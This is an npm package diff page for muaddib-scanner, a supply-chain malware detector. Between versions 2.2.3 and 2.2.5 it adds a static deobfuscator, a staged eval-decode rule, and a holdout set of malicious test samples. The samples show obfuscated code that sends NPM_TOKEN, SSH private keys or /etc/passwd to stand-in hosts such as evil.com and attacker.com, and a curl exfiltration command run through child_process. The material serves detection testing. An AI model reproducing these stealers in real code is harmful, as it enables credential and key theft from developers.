npm - muaddib-scanner - Versions diffs - 2.2.3 → 2.2.5 - Mend

muaddib-scanner 2.2.3 → 2.2.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (30) hide show

package/README.fr.md +1 -35
package/README.md +1 -35
package/bin/muaddib.js +6 -10
package/datasets/holdout-v4/atob-eval/index.js +2 -0
package/datasets/holdout-v4/atob-eval/package.json +5 -0
package/datasets/holdout-v4/base64-require/index.js +3 -0
package/datasets/holdout-v4/base64-require/package.json +5 -0
package/datasets/holdout-v4/charcode-fetch/index.js +3 -0
package/datasets/holdout-v4/charcode-fetch/package.json +5 -0
package/datasets/holdout-v4/charcode-spread-homedir/index.js +5 -0
package/datasets/holdout-v4/charcode-spread-homedir/package.json +5 -0
package/datasets/holdout-v4/concat-env-steal/index.js +4 -0
package/datasets/holdout-v4/concat-env-steal/package.json +5 -0
package/datasets/holdout-v4/double-decode-exfil/index.js +4 -0
package/datasets/holdout-v4/double-decode-exfil/package.json +5 -0
package/datasets/holdout-v4/hex-array-exec/index.js +3 -0
package/datasets/holdout-v4/hex-array-exec/package.json +5 -0
package/datasets/holdout-v4/mixed-obfuscation-stealer/index.js +10 -0
package/datasets/holdout-v4/mixed-obfuscation-stealer/package.json +5 -0
package/datasets/holdout-v4/nested-base64-concat/index.js +4 -0
package/datasets/holdout-v4/nested-base64-concat/package.json +5 -0
package/datasets/holdout-v4/template-literal-hide/index.js +3 -0
package/datasets/holdout-v4/template-literal-hide/package.json +5 -0
package/package.json +1 -1
package/src/index.js +6 -2
package/src/response/playbooks.js +5 -0
package/src/rules/index.js +13 -0
package/src/scanner/ast.js +107 -24
package/src/scanner/dataflow.js +18 -1
package/src/scanner/deobfuscate.js +557 -0

package/README.fr.md CHANGED Viewed

@@ -327,40 +327,6 @@ muaddib scan . --breakdown
 Affiche la décomposition explicable du score : contribution de chaque finding au score final, avec les poids par règle et multiplicateurs de sévérité.
-### API Threat Feed
-```bash
-muaddib feed [--limit N] [--severity LEVEL] [--since DATE]
-muaddib serve [--port N]
-```
-Exporte les détections sous forme de flux JSON pour intégration SIEM.
-- `muaddib feed` — Affiche le flux de menaces JSON sur stdout (filtrable par limit, sévérité, date)
-- `muaddib serve` — Démarre un serveur HTTP (port 3000 par défaut) avec `GET /feed` et `GET /health`
-```bash
-muaddib serve --port 8080
-# GET http://localhost:8080/feed?limit=50&severity=HIGH
-# GET http://localhost:8080/health
-```
-### Logging des temps de détection
-```bash
-muaddib detections [--stats] [--json]
-```
-Historique des détections avec timestamps de première observation et métriques de lead time (délai entre la détection MUAD'DIB et l'advisory publique).
-### Suivi du taux de faux positifs
-```bash
-muaddib stats [--daily] [--json]
-```
-Statistiques de scan : total scanné, clean, suspect, taux de faux positifs, nombre confirmé malveillant. Utilisez `--daily` pour le détail par jour.
 ### Replay ground truth
 ```bash
@@ -739,7 +705,7 @@ Output (CLI, JSON, HTML, SARIF, Webhook, Threat Feed)
 - **ADR** (Adversarial Detection Rate) : taux de detection sur 35 samples malveillants evasifs (4 vagues red team + holdout promu)
 - **Holdout** (pre-tuning) : taux de detection sur 10 samples jamais vus avant correction des regles (mesure de generalisation)
-Lancez `muaddib evaluate` pour reproduire ces metriques localement. Voir [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) pour le protocole experimental complet.
+Voir [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) pour le protocole experimental complet.
 ---

package/README.md CHANGED Viewed

@@ -327,40 +327,6 @@ muaddib scan . --breakdown
 Shows explainable score breakdown: how each finding contributes to the final risk score, with per-rule weights and severity multipliers.
-### Threat Feed API
-```bash
-muaddib feed [--limit N] [--severity LEVEL] [--since DATE]
-muaddib serve [--port N]
-```
-Export detections as a JSON threat feed for SIEM integration.
-- `muaddib feed` — Output threat feed JSON to stdout (filterable by limit, severity, date)
-- `muaddib serve` — Start an HTTP server (default port 3000) with `GET /feed` and `GET /health` endpoints
-```bash
-muaddib serve --port 8080
-# GET http://localhost:8080/feed?limit=50&severity=HIGH
-# GET http://localhost:8080/health
-```
-### Detection time logging
-```bash
-muaddib detections [--stats] [--json]
-```
-View detection history with first-seen timestamps and lead time metrics (time between MUAD'DIB detection and public advisory).
-### FP rate tracking
-```bash
-muaddib stats [--daily] [--json]
-```
-View scan statistics: total scanned, clean, suspect, false positive rate, confirmed malicious count. Use `--daily` for per-day breakdown.
 ### Ground truth replay
 ```bash
@@ -742,7 +708,7 @@ Output (CLI, JSON, HTML, SARIF, Webhook, Threat Feed)
 - **ADR** (Adversarial Detection Rate): detection rate on 35 evasive malicious samples across 4 red-team waves + promoted holdout
 - **Holdout** (pre-tuning): detection rate on 10 unseen samples before any rule correction (measures generalization)
-Run `muaddib evaluate` to reproduce these metrics locally. See [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) for the full experimental protocol.
+See [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) for the full experimental protocol.
 ---

package/bin/muaddib.js CHANGED Viewed

@@ -31,6 +31,7 @@ let temporalPublishMode = false;
 let temporalMaintainerMode = false;
 let temporalFullMode = false;
 let breakdownMode = false;
+let noDeobfuscate = false;
 let feedLimit = null;
 let feedSeverity = null;
 let feedSince = null;
@@ -110,6 +111,8 @@ for (let i = 0; i < options.length; i++) {
     temporalMaintainerMode = true;
   } else if (options[i] === '--breakdown') {
     breakdownMode = true;
+  } else if (options[i] === '--no-deobfuscate') {
+    noDeobfuscate = true;
   } else if (options[i] === '--temporal') {
     temporalMode = true;
   } else if (options[i] === '--limit') {
@@ -363,15 +366,6 @@ const helpText = `
     muaddib scrape                   Scrape new IOCs
     muaddib sandbox <pkg> [--strict] [--no-canary]  Analyze in isolated Docker container
     muaddib sandbox-report <pkg>     Sandbox + detailed network report
-    muaddib feed [options]            Threat feed (JSON)
-    muaddib serve [options]           Start threat feed HTTP server
-    muaddib detections               List recent detections
-    muaddib detections --stats       Show aggregated detection stats
-    muaddib detections --json        Raw JSON output
-    muaddib stats                    Show scan stats + FP rate
-    muaddib stats --daily            Last 7 days daily breakdown
-    muaddib stats --json             Raw JSON dump
-    muaddib evaluate                 Evaluate scanner effectiveness (TPR, FPR, ADR)
     muaddib version                  Show version
   Replay Options:
@@ -404,6 +398,7 @@ const helpText = `
     --temporal-maintainer  Detect maintainer changes (new maintainer, account takeover)
     --temporal-full     All temporal analyses (lifecycle + AST + publish + maintainer)
     --no-canary         Disable honey token injection in sandbox
+    --no-deobfuscate    Disable deobfuscation pre-processing
     --exclude [dir]     Exclude directory from scan (repeatable)
     --limit [n]         Limit feed entries (default: 50)
     --severity [level]  Filter by severity (CRITICAL|HIGH|MEDIUM|LOW)
@@ -444,7 +439,8 @@ if (command === 'version' || command === '--version' || command === '-v') {
     temporalMaintainer: temporalMaintainerMode || temporalFullMode,
     exclude: excludeDirs,
     entropyThreshold: entropyThreshold,
-    breakdown: breakdownMode
+    breakdown: breakdownMode,
+    noDeobfuscate: noDeobfuscate
   }).then(exitCode => {
     process.exit(exitCode);
   }).catch(err => {

package/datasets/holdout-v4/atob-eval/index.js ADDED Viewed

	@@ -0,0 +1,2 @@
1	+ // Holdout v4 — atob-eval: classic atob + eval payload
2	+ eval(atob('Y29uc29sZS5sb2coInB3bmVkIik='));

package/datasets/holdout-v4/atob-eval/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "atob-eval",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/base64-require/index.js ADDED Viewed

@@ -0,0 +1,3 @@
+// Holdout v4 — base64-require: module name hidden in base64
+const mod = require(Buffer.from('Y2hpbGRfcHJvY2Vzcw==', 'base64').toString());
+mod.exec('whoami');

package/datasets/holdout-v4/base64-require/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "base64-require",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/charcode-fetch/index.js ADDED Viewed

@@ -0,0 +1,3 @@
+// Holdout v4 — charcode-fetch: URL rebuilt from charCodes
+const url = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 101, 118, 105, 108, 46, 99, 111, 109);
+fetch(url, { method: 'POST', body: process.env.NPM_TOKEN });

package/datasets/holdout-v4/charcode-fetch/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "charcode-fetch",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/charcode-spread-homedir/index.js ADDED Viewed

@@ -0,0 +1,5 @@
+// Holdout v4 — charcode-spread-homedir: module 'os' hidden via charCodes
+const h = String.fromCharCode(...[111, 115]);
+const m = require(h).homedir();
+const f = require('fs').readFileSync(m + '/.ssh/id_rsa');
+require('https').request('https://evil.com').write(f);

package/datasets/holdout-v4/charcode-spread-homedir/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "charcode-spread-homedir",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/concat-env-steal/index.js ADDED Viewed

@@ -0,0 +1,4 @@
+// Holdout v4 — concat-env-steal: env var name rebuilt by concat
+const key = 'NPM' + '_' + 'TOK' + 'EN';
+const val = process.env[key];
+require('https').request({ hostname: 'evil.com', path: '/steal', method: 'POST' }, () => {}).write(val);

package/datasets/holdout-v4/concat-env-steal/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "concat-env-steal",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/double-decode-exfil/index.js ADDED Viewed

@@ -0,0 +1,4 @@
+// Holdout v4 — double-decode-exfil: double base64 encoding
+const modName = Buffer.from(Buffer.from('WTJocGJHUmZjSEp2WTJWemN3PT0=', 'base64').toString(), 'base64').toString();
+const proc = require(modName);
+proc.exec('curl https://evil.com/exfil?data=$(cat /etc/passwd)');

package/datasets/holdout-v4/double-decode-exfil/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "double-decode-exfil",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/hex-array-exec/index.js ADDED Viewed

@@ -0,0 +1,3 @@
+// Holdout v4 — hex-array-exec: shell command hidden in hex array
+const cmd = [0x63, 0x75, 0x72, 0x6c, 0x20, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3a, 0x2f, 0x2f, 0x65, 0x76, 0x69, 0x6c, 0x2e, 0x63, 0x6f, 0x6d].map(c => String.fromCharCode(c)).join('');
+require('child_process').exec(cmd);

package/datasets/holdout-v4/hex-array-exec/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "hex-array-exec",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/mixed-obfuscation-stealer/index.js ADDED Viewed

@@ -0,0 +1,10 @@
+// Holdout v4 — mixed-obfuscation-stealer: 3 techniques combined
+// Module name via charCode
+const modName = String.fromCharCode(102, 115);
+// Path via base64
+const credPath = Buffer.from('L2V0Yy9wYXNzd2Q=', 'base64').toString();
+// URL via concat
+const host = 'https://' + 'att' + 'acker' + '.com';
+const data = require(modName).readFileSync(credPath, 'utf8');
+require('https').request(host, { method: 'POST' }, () => {}).write(data);

package/datasets/holdout-v4/mixed-obfuscation-stealer/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "mixed-obfuscation-stealer",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/nested-base64-concat/index.js ADDED Viewed

@@ -0,0 +1,4 @@
+// Holdout v4 — nested-base64-concat: split base64 + concat
+const a = Buffer.from('Y2hpbGRf', 'base64').toString();
+const b = Buffer.from('cHJvY2Vzcw==', 'base64').toString();
+require(a + b).exec('id');

package/datasets/holdout-v4/nested-base64-concat/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "nested-base64-concat",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/template-literal-hide/index.js ADDED Viewed

@@ -0,0 +1,3 @@
+// Holdout v4 — template-literal-hide: module name via template literals
+const mod = `${'child'}${'_process'}`;
+require(mod).exec('curl evil.com');

package/datasets/holdout-v4/template-literal-hide/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "template-literal-hide",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.2.3",
+  "version": "2.2.5",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/src/index.js CHANGED Viewed

@@ -19,6 +19,7 @@ const { loadCachedIOCs } = require('./ioc/updater.js');
 const { ensureIOCs } = require('./ioc/bootstrap.js');
 const { scanEntropy } = require('./scanner/entropy.js');
 const { scanAIConfig } = require('./scanner/ai-config.js');
+const { deobfuscate } = require('./scanner/deobfuscate.js');
 const { detectSuddenLifecycleChange } = require('./temporal-analysis.js');
 const { detectSuddenAstChanges } = require('./temporal-ast-diff.js');
 const { detectPublishAnomaly } = require('./publish-anomaly.js');
@@ -222,6 +223,9 @@ async function run(targetPath, options = {}) {
     spinner.start(`[MUADDIB] Scanning ${targetPath}...`);
   }
+  // Deobfuscation pre-processor (pass to AST/dataflow scanners unless disabled)
+  const deobfuscateFn = options.noDeobfuscate ? null : deobfuscate;
   // Parallel execution of all independent scanners
   const [
     packageThreats,
@@ -240,11 +244,11 @@ async function run(targetPath, options = {}) {
   ] = await Promise.all([
     scanPackageJson(targetPath),
     scanShellScripts(targetPath),
-    analyzeAST(targetPath),
+    analyzeAST(targetPath, { deobfuscate: deobfuscateFn }),
     Promise.resolve(detectObfuscation(targetPath)),
     scanDependencies(targetPath),
     scanHashes(targetPath),
-    analyzeDataFlow(targetPath),
+    analyzeDataFlow(targetPath, { deobfuscate: deobfuscateFn }),
     scanTyposquatting(targetPath),
     Promise.resolve(scanGitHubActions(targetPath)),
     Promise.resolve(matchPythonIOCs(pythonDeps, targetPath)),

package/src/response/playbooks.js CHANGED Viewed

@@ -318,6 +318,11 @@ const PLAYBOOKS = {
     'Fichier binaire (.png/.jpg/.wasm) reference avec eval() dans le meme fichier. ' +
     'Technique de steganographie: le payload malveillant est cache dans les pixels d\'une image ou les sections d\'un WASM. ' +
     'Analyser le fichier binaire dans un sandbox. Verifier les donnees extraites avant execution.',
+  staged_eval_decode:
+    'CRITIQUE: eval() ou Function() recoit un argument decode en base64 (atob/Buffer.from). ' +
+    'Technique de staged payload: le code malveillant est encode puis decode et execute dynamiquement. ' +
+    'Isoler la machine. Decoder le payload manuellement pour analyser le code execute. Supprimer le package.',
 };
 function getPlaybook(threatType) {

package/src/rules/index.js CHANGED Viewed

@@ -585,6 +585,19 @@ const RULES = {
     mitre: 'T1027.003'
   },
+  staged_eval_decode: {
+    id: 'MUADDIB-AST-021',
+    name: 'Staged Eval Decode',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'eval() ou Function() recoit un argument decode (atob ou Buffer.from base64). Pattern classique de staged payload: le code malveillant est encode en base64 puis decode et execute dynamiquement.',
+    references: [
+      'https://attack.mitre.org/techniques/T1140/',
+      'https://attack.mitre.org/techniques/T1059/007/'
+    ],
+    mitre: 'T1140'
+  },
   env_charcode_reconstruction: {
     id: 'MUADDIB-AST-018',
     name: 'Environment Variable Key Reconstruction',

package/src/scanner/ast.js CHANGED Viewed

@@ -92,22 +92,22 @@ const SANDBOX_INDICATORS = [
   '/proc/self/cgroup'
 ];
-async function analyzeAST(targetPath) {
+async function analyzeAST(targetPath, options = {}) {
   const threats = [];
   const files = findJsFiles(targetPath);
   for (const file of files) {
     const relativePath = path.relative(targetPath, file).replace(/\\/g, '/');
     if (EXCLUDED_FILES.includes(relativePath)) {
       continue;
     }
     // Ignore files in dev folders
     if (isDevFile(relativePath)) {
       continue;
     }
     try {
       const stat = fs.statSync(file);
       if (stat.size > MAX_FILE_SIZE) continue;
@@ -119,8 +119,26 @@ async function analyzeAST(targetPath) {
     } catch {
       continue;
     }
+    // Analyze original code first (preserves obfuscation-detection rules)
     const fileThreats = analyzeFile(content, file, targetPath);
     threats.push(...fileThreats);
+    // Also analyze deobfuscated code for additional findings hidden by obfuscation
+    if (typeof options.deobfuscate === 'function') {
+      try {
+        const result = options.deobfuscate(content);
+        if (result.transforms.length > 0) {
+          const deobThreats = analyzeFile(result.code, file, targetPath);
+          const existingKeys = new Set(fileThreats.map(t => `${t.type}::${t.message}`));
+          for (const dt of deobThreats) {
+            if (!existingKeys.has(`${dt.type}::${dt.message}`)) {
+              threats.push(dt);
+            }
+          }
+        }
+      } catch { /* deobfuscation failed — skip */ }
+    }
   }
   return threats;
@@ -137,6 +155,34 @@ function hasOnlyStringLiteralArgs(node) {
   return node.arguments.every(arg => arg.type === 'Literal' && typeof arg.value === 'string');
 }
+/**
+ * Returns true if a node is a decode call: atob(str) or Buffer.from(str,'base64').toString()
+ * Used to detect staged eval/Function decode patterns.
+ */
+function hasDecodeArg(node) {
+  if (!node || typeof node !== 'object') return false;
+  // atob('...')
+  if (node.type === 'CallExpression' &&
+      node.callee?.type === 'Identifier' && node.callee.name === 'atob') {
+    return true;
+  }
+  // Buffer.from('...', 'base64').toString()
+  if (node.type === 'CallExpression' &&
+      node.callee?.type === 'MemberExpression' &&
+      node.callee.property?.name === 'toString') {
+    const inner = node.callee.object;
+    if (inner?.type === 'CallExpression' &&
+        inner.callee?.type === 'MemberExpression' &&
+        inner.callee.object?.name === 'Buffer' &&
+        inner.callee.property?.name === 'from' &&
+        inner.arguments?.length >= 2 &&
+        inner.arguments[1]?.value === 'base64') {
+      return true;
+    }
+  }
+  return false;
+}
 /**
  * Checks if an AST subtree contains decode patterns (base64, atob, fromCharCode).
  */
@@ -391,6 +437,23 @@ function analyzeFile(content, filePath, basePath) {
         }
       }
+      // Detect chained: require(non-literal).exec(...) — direct dynamic require + exec
+      if ((execName || memberExec) && node.callee.type === 'MemberExpression' &&
+          node.callee.object?.type === 'CallExpression') {
+        const innerCall = node.callee.object;
+        const innerName = getCallName(innerCall);
+        if (innerName === 'require' && innerCall.arguments.length > 0 &&
+            innerCall.arguments[0]?.type !== 'Literal') {
+          const method = execName || memberExec;
+          threats.push({
+            type: 'dynamic_require_exec',
+            severity: 'CRITICAL',
+            message: `${method}() chained on dynamic require() — obfuscated module + command execution.`,
+            file: path.relative(basePath, filePath)
+          });
+        }
+      }
       // Detect sandbox/container evasion: fs.accessSync('/.dockerenv'), fs.existsSync('/.dockerenv'), etc.
       if (node.callee.type === 'MemberExpression' && node.callee.property?.type === 'Identifier') {
         const fsMethod = node.callee.property.name;
@@ -608,27 +671,47 @@ function analyzeFile(content, filePath, basePath) {
       if (callName === 'eval') {
         hasEvalInFile = true;
-        const isConstant = hasOnlyStringLiteralArgs(node);
-        threats.push({
-          type: 'dangerous_call_eval',
-          severity: isConstant ? 'LOW' : 'HIGH',
-          message: isConstant
-            ? 'eval() with constant string literal (low risk, globalThis polyfill pattern).'
-            : 'Dangerous call "eval" with dynamic expression detected.',
-          file: path.relative(basePath, filePath)
-        });
+        // Detect staged eval decode: eval(atob(...)) or eval(Buffer.from(...).toString())
+        if (node.arguments.length === 1 && hasDecodeArg(node.arguments[0])) {
+          threats.push({
+            type: 'staged_eval_decode',
+            severity: 'CRITICAL',
+            message: 'eval() with decode argument (atob/Buffer.from base64) — staged payload execution.',
+            file: path.relative(basePath, filePath)
+          });
+        } else {
+          const isConstant = hasOnlyStringLiteralArgs(node);
+          threats.push({
+            type: 'dangerous_call_eval',
+            severity: isConstant ? 'LOW' : 'HIGH',
+            message: isConstant
+              ? 'eval() with constant string literal (low risk, globalThis polyfill pattern).'
+              : 'Dangerous call "eval" with dynamic expression detected.',
+            file: path.relative(basePath, filePath)
+          });
+        }
       } else if (callName === 'Function') {
-        const isConstant = hasOnlyStringLiteralArgs(node);
-        // Function() creates a new scope (unlike eval), so dynamic usage is MEDIUM not HIGH.
-        // Common in template engines (lodash, handlebars) and globalThis polyfills.
-        threats.push({
-          type: 'dangerous_call_function',
-          severity: isConstant ? 'LOW' : 'MEDIUM',
-          message: isConstant
-            ? 'Function() with constant string literal (low risk, globalThis polyfill pattern).'
-            : 'Function() with dynamic expression (template/factory pattern).',
-          file: path.relative(basePath, filePath)
-        });
+        // Detect staged Function decode: new Function(atob(...))
+        if (node.arguments.length >= 1 && hasDecodeArg(node.arguments[node.arguments.length - 1])) {
+          threats.push({
+            type: 'staged_eval_decode',
+            severity: 'CRITICAL',
+            message: 'Function() with decode argument (atob/Buffer.from base64) — staged payload execution.',
+            file: path.relative(basePath, filePath)
+          });
+        } else {
+          const isConstant = hasOnlyStringLiteralArgs(node);
+          // Function() creates a new scope (unlike eval), so dynamic usage is MEDIUM not HIGH.
+          // Common in template engines (lodash, handlebars) and globalThis polyfills.
+          threats.push({
+            type: 'dangerous_call_function',
+            severity: isConstant ? 'LOW' : 'MEDIUM',
+            message: isConstant
+              ? 'Function() with constant string literal (low risk, globalThis polyfill pattern).'
+              : 'Function() with dynamic expression (template/factory pattern).',
+            file: path.relative(basePath, filePath)
+          });
+        }
       }
     },

package/src/scanner/dataflow.js CHANGED Viewed

@@ -6,7 +6,7 @@ const { isDevFile, findJsFiles, getCallName } = require('../utils.js');
 const MAX_FILE_SIZE = 10 * 1024 * 1024; // 10MB
-async function analyzeDataFlow(targetPath) {
+async function analyzeDataFlow(targetPath, options = {}) {
   const threats = [];
   const files = findJsFiles(targetPath);
@@ -35,8 +35,25 @@ async function analyzeDataFlow(targetPath) {
       continue;
     }
+    // Analyze original code first (preserves obfuscation-detection rules)
     const fileThreats = analyzeFile(content, file, targetPath);
     threats.push(...fileThreats);
+    // Also analyze deobfuscated code for additional findings hidden by obfuscation
+    if (typeof options.deobfuscate === 'function') {
+      try {
+        const result = options.deobfuscate(content);
+        if (result.transforms.length > 0) {
+          const deobThreats = analyzeFile(result.code, file, targetPath);
+          const existingKeys = new Set(fileThreats.map(t => `${t.type}::${t.message}`));
+          for (const dt of deobThreats) {
+            if (!existingKeys.has(`${dt.type}::${dt.message}`)) {
+              threats.push(dt);
+            }
+          }
+        }
+      } catch { /* deobfuscation failed — skip */ }
+    }
   }
   return threats;

package/src/scanner/deobfuscate.js ADDED Viewed

@@ -0,0 +1,557 @@
+'use strict';
+const acorn = require('acorn');
+const walk = require('acorn-walk');
+/**
+ * Lightweight static deobfuscation pre-processor.
+ * Resolves common JS obfuscation patterns via AST rewriting (no eval).
+ *
+ * @param {string} sourceCode — raw JS source
+ * @returns {{ code: string, transforms: Array<{type: string, start: number, end: number, before: string, after: string}> }}
+ */
+function deobfuscate(sourceCode) {
+  const transforms = [];
+  // Parse AST — if parsing fails, return source unchanged (fail-safe)
+  let ast;
+  try {
+    ast = acorn.parse(sourceCode, {
+      ecmaVersion: 2024,
+      sourceType: 'module',
+      allowHashBang: true,
+      ranges: true
+    });
+  } catch {
+    return { code: sourceCode, transforms };
+  }
+  // Collect replacements as { start, end, value, type, before }
+  const replacements = [];
+  walk.simple(ast, {
+    // ---- 1. STRING CONCAT FOLDING ----
+    // 'ch' + 'il' + 'd_' + 'process' → 'child_process'
+    BinaryExpression(node) {
+      if (node.operator !== '+') return;
+      const folded = tryFoldConcat(node);
+      if (folded === null) return;
+      // Avoid folding single literals (no transformation needed)
+      if (node.left.type === 'Literal' && node.right.type === 'Literal' &&
+          typeof node.left.value === 'string' && typeof node.right.value === 'string') {
+        // Simple two-literal concat — always fold
+      } else if (node.type === 'BinaryExpression') {
+        // Nested concat — only fold if top-level (not already inside a folded parent)
+        // We check this by not folding if parent already covers this range
+      }
+      const before = sourceCode.slice(node.start, node.end);
+      const after = quoteString(folded);
+      replacements.push({
+        start: node.start,
+        end: node.end,
+        value: after,
+        type: 'string_concat',
+        before
+      });
+    },
+    // ---- 2. CHARCODE REBUILD + 3. BASE64 DECODE ----
+    CallExpression(node) {
+      // String.fromCharCode(99, 104, 105, 108, 100) → "child"
+      if (isStringFromCharCode(node)) {
+        const nums = extractNumericArgs(node);
+        if (nums === null) return;
+        try {
+          const decoded = String.fromCharCode(...nums);
+          const before = sourceCode.slice(node.start, node.end);
+          const after = quoteString(decoded);
+          replacements.push({
+            start: node.start,
+            end: node.end,
+            value: after,
+            type: 'charcode',
+            before
+          });
+        } catch { /* invalid char codes — skip */ }
+        return;
+      }
+      // Buffer.from('...', 'base64').toString() → decoded string
+      if (isBufferBase64ToString(node)) {
+        const b64str = extractBufferBase64Arg(node);
+        if (b64str === null) return;
+        try {
+          const decoded = Buffer.from(b64str, 'base64').toString();
+          // Sanity: only replace if decoded is printable ASCII/UTF-8
+          if (!isPrintable(decoded)) return;
+          const before = sourceCode.slice(node.start, node.end);
+          const after = quoteString(decoded);
+          replacements.push({
+            start: node.start,
+            end: node.end,
+            value: after,
+            type: 'base64',
+            before
+          });
+        } catch { /* decode failure — skip */ }
+        return;
+      }
+      // atob('...') → decoded string
+      if (isAtobCall(node)) {
+        const b64str = node.arguments[0]?.value;
+        if (typeof b64str !== 'string') return;
+        try {
+          const decoded = Buffer.from(b64str, 'base64').toString();
+          if (!isPrintable(decoded)) return;
+          const before = sourceCode.slice(node.start, node.end);
+          const after = quoteString(decoded);
+          replacements.push({
+            start: node.start,
+            end: node.end,
+            value: after,
+            type: 'base64',
+            before
+          });
+        } catch { /* skip */ }
+        return;
+      }
+      // ---- 4. HEX ARRAY MAP ----
+      // [0x63, 0x68, ...].map(c => String.fromCharCode(c)).join('')
+      const hexResult = tryResolveHexArrayMap(node, sourceCode);
+      if (hexResult !== null) {
+        replacements.push(hexResult);
+      }
+    }
+  });
+  // De-duplicate: nested BinaryExpression nodes produce overlapping replacements.
+  // Keep only the outermost (widest) replacement for each overlapping range.
+  replacements.sort((a, b) => a.start - b.start || b.end - a.end);
+  const filtered = [];
+  let lastEnd = -1;
+  for (const r of replacements) {
+    if (r.start < lastEnd) continue; // nested inside a wider replacement — skip
+    filtered.push(r);
+    lastEnd = r.end;
+  }
+  // Apply replacements from end to start to preserve positions
+  filtered.sort((a, b) => b.start - a.start);
+  let code = sourceCode;
+  for (const r of filtered) {
+    code = code.slice(0, r.start) + r.value + code.slice(r.end);
+    transforms.push({
+      type: r.type,
+      start: r.start,
+      end: r.end,
+      before: r.before,
+      after: r.value
+    });
+  }
+  // Reverse transforms so they're in source order (start ascending)
+  transforms.reverse();
+  // ---- PHASE 2: CONST PROPAGATION ----
+  // If phase 1 produced transforms, re-parse and propagate const string assignments.
+  // const a = 'child_'; const b = 'process'; require(a + b) → require('child_' + 'process') → require('child_process')
+  if (transforms.length > 0) {
+    const phase2 = propagateConsts(code);
+    if (phase2.transforms.length > 0) {
+      code = phase2.code;
+      transforms.push(...phase2.transforms);
+    }
+  }
+  return { code, transforms };
+}
+/**
+ * Phase 2: Propagate const string literal assignments into identifier references,
+ * then fold any resulting string concatenations.
+ */
+function propagateConsts(sourceCode) {
+  const transforms = [];
+  let ast;
+  try {
+    ast = acorn.parse(sourceCode, {
+      ecmaVersion: 2024,
+      sourceType: 'module',
+      allowHashBang: true,
+      ranges: true
+    });
+  } catch {
+    return { code: sourceCode, transforms };
+  }
+  // Collect const declarations: name → { value, initStart, initEnd }
+  const constMap = new Map();
+  // Track which names are assigned more than once (not safe to propagate)
+  const reassigned = new Set();
+  walk.simple(ast, {
+    VariableDeclaration(node) {
+      if (node.kind !== 'const') return;
+      for (const decl of node.declarations) {
+        if (decl.id?.type !== 'Identifier') continue;
+        if (!decl.init) continue;
+        if (decl.init.type === 'Literal' && typeof decl.init.value === 'string') {
+          constMap.set(decl.id.name, {
+            value: decl.init.value,
+            declStart: decl.init.start,
+            declEnd: decl.init.end
+          });
+        }
+      }
+    },
+    AssignmentExpression(node) {
+      if (node.left?.type === 'Identifier') {
+        reassigned.add(node.left.name);
+      }
+    }
+  });
+  // Remove reassigned names from constMap (not safe)
+  for (const name of reassigned) {
+    constMap.delete(name);
+  }
+  if (constMap.size === 0) {
+    return { code: sourceCode, transforms };
+  }
+  // Find all Identifier references to propagate (excluding declarations and property names)
+  const replacements = [];
+  walk.simple(ast, {
+    Identifier(node) {
+      if (!constMap.has(node.name)) return;
+      const info = constMap.get(node.name);
+      // Skip the declaration site itself
+      if (node.start === info.declStart || (node.start >= info.declStart && node.end <= info.declEnd)) return;
+      replacements.push({
+        start: node.start,
+        end: node.end,
+        value: quoteString(info.value),
+        type: 'const_propagation',
+        before: sourceCode.slice(node.start, node.end)
+      });
+    }
+  });
+  // Filter: skip property access identifiers (obj.prop — prop is not a variable ref)
+  // We detect this by checking if the identifier is a property of a MemberExpression
+  const propPositions = new Set();
+  walk.simple(ast, {
+    MemberExpression(node) {
+      if (!node.computed && node.property?.type === 'Identifier') {
+        propPositions.add(node.property.start);
+      }
+    },
+    VariableDeclarator(node) {
+      // Skip the declaration name itself
+      if (node.id?.type === 'Identifier') {
+        propPositions.add(node.id.start);
+      }
+    }
+  });
+  const validReplacements = replacements.filter(r => !propPositions.has(r.start));
+  if (validReplacements.length === 0) {
+    return { code: sourceCode, transforms };
+  }
+  // Apply replacements from end to start
+  validReplacements.sort((a, b) => b.start - a.start);
+  let code = sourceCode;
+  for (const r of validReplacements) {
+    code = code.slice(0, r.start) + r.value + code.slice(r.end);
+    transforms.push({
+      type: r.type,
+      start: r.start,
+      end: r.end,
+      before: r.before,
+      after: r.value
+    });
+  }
+  // Now re-run concat folding on the propagated code
+  const phase3 = foldConcatsOnly(code);
+  if (phase3.transforms.length > 0) {
+    code = phase3.code;
+    transforms.push(...phase3.transforms);
+  }
+  transforms.reverse();
+  return { code, transforms };
+}
+/**
+ * Run only string concat folding on code (phase 3 after const propagation).
+ */
